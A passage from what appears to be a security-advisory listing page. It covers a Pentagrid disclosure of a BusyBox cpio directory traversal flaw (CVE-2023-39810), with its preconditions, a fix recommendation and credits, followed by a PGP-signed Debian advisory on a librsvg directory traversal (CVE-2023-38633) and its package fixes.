/tmp/testcase/testfile           <-- extracted rel. file
/tmp/testcase/a
/tmp/testcase/a/b                <-- working directory
/tmp/testcase/a/b/etc
/tmp/testcase/a/b/etc/hostname   <-- extracted abs. file
/tmp/testcase/a/b/archive.cpio   <-- archive to extract

According to the output above, the testfile is written outside of the working directory.

**Precondition**

An untrusted archive is extracted with the BusyBox cpio tool and the running cpio process has permissions to write files outside the destination directory.

**Recommendation**

Pentagrid recommends changing the default behaviour and to ignore relative file names within a cpio archive. To process files with relative file names, a command line flag could be introduced like it was done for GNU cpio.

Users can specify on the BusyBox cpio command line which file name should be unpacked, which should be safe as long as no directory traversal is included in that file name argument.

**Credits**

The vulnerability has been found by Tobias Ospelt and Martin Schobert of Pentagrid.

CVE-2023-39810: Busybox cpio directory traversal vulnerability (CVE-2023-39810)

Debian Linux Security Advisory 5484-1 - Zac Sims discovered a directory traversal in the URL decoder of librsvg, a SAX-based renderer library for SVG files, which could result in read of arbitrary files when processing a specially crafted SVG file with an include element.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5484-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoAugust 27, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : librsvgCVE ID         : CVE-2023-38633Debian Bug     : 1041810Zac Sims discovered a directory traversal in the URL decoder of librsvg,a SAX-based renderer library for SVG files, which could result in readof arbitrary files when processing a specially crafted SVG file with aninclude element.For the oldstable distribution (bullseye), this problem has been fixedin version 2.50.3+dfsg-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 2.54.7+dfsg-1~deb12u1.We recommend that you upgrade your librsvg packages.For the detailed security status of librsvg please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/librsvgFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTrXKhfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TYkg//Q+FWCbAqpcLPI+InN0nga0wROM6JVxX3CVPTg6/4U0XKjPRmx4wlX6RvRPk1n4M8I7pjdtXT1PfdVsXpwT1+mFewUkOb4aLkuX5+0NOJbxAS6L6Oo1jNs4r0PJYPcda7edePoIScJ2vH14/yhJs+7ROV3hI0to5CpxT5KejGLTbkhWSs79YMvHxZBPLcSE/NDOCkDzlJ1aVBndmvgqQGujN7hvjynIi8IGEXrPAofqHO1pfVGtBWtK5oajXwxdAU2t0+wy4Lc0U2NPDF6r9QIeZidamJ0yfgPbuiU4WCx1lbkCAMG4Bf6m5S4JqbQmgc+rZCBHy3zaKlipFOEyPe2tfrcvH8zljRXSiKL5P0zMwVeYIRsQj3lUvPge+xV8Gqod99uv4fgN19OWvcP5HOiXxQnkRtReYiQgKut8W0HAXydCsrctAB2XvprYIbsnR1lU8dBAaLqnC/nwrsLVLUv7y1oKDDNjXmNT/aF/ISVF70WVywQK/LbhXIyECoGe+TeoxGjCjT+N/PibL3pMIZ/c8ZLMyH+2+Ad/oD614hPVbe7CUmRCX7Vz2ax8v47b4JY2skki9XdASkKsyvBq9Xus6ZY04D0tTj87wF0Vr4iBAbnFWSJnw2tFVLwn7/ncNkpU/MONR8CAPvhgBc8n/nfF9Fbg6ubEeAHdzlp8EOom8==uwUe-----END PGP SIGNATURE-----

Tag

#debian